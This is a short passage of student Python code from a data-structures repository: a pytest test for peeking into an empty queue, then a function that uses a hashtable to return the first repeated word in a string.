def test_peek_on_empty_queue():
new_queue = Queue()
with pytest.raises(InvalidOperationError) as e:
new_queue.peek()
assert str(e.value) == "Method not allowed on empty collection"
# Write tests to prove the following functionality:
# Can successfully peek into a queue, seeing the expected value
# Can successfully empty a queue after multiple dequeues
# Can successfully instantiate an empty queue
# Calling dequeue or peek on empty queue raises exception
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/hashmap_repeated/hashmap_repeated.py | from code_challenges.hashtable.hashtable import Hashtable
def word_repeat(string):
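    # Strip commas and periods, lowercase each word, and return the first word
    # seen twice; implicitly returns None when nothing repeats.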
words = string.replace(',', '').replace('.', '').split(" ")
ht = Hashtable()
for word in words:
word = word.lower()
if ht.contains(word):
return word
else:
ht.add(word, word)
|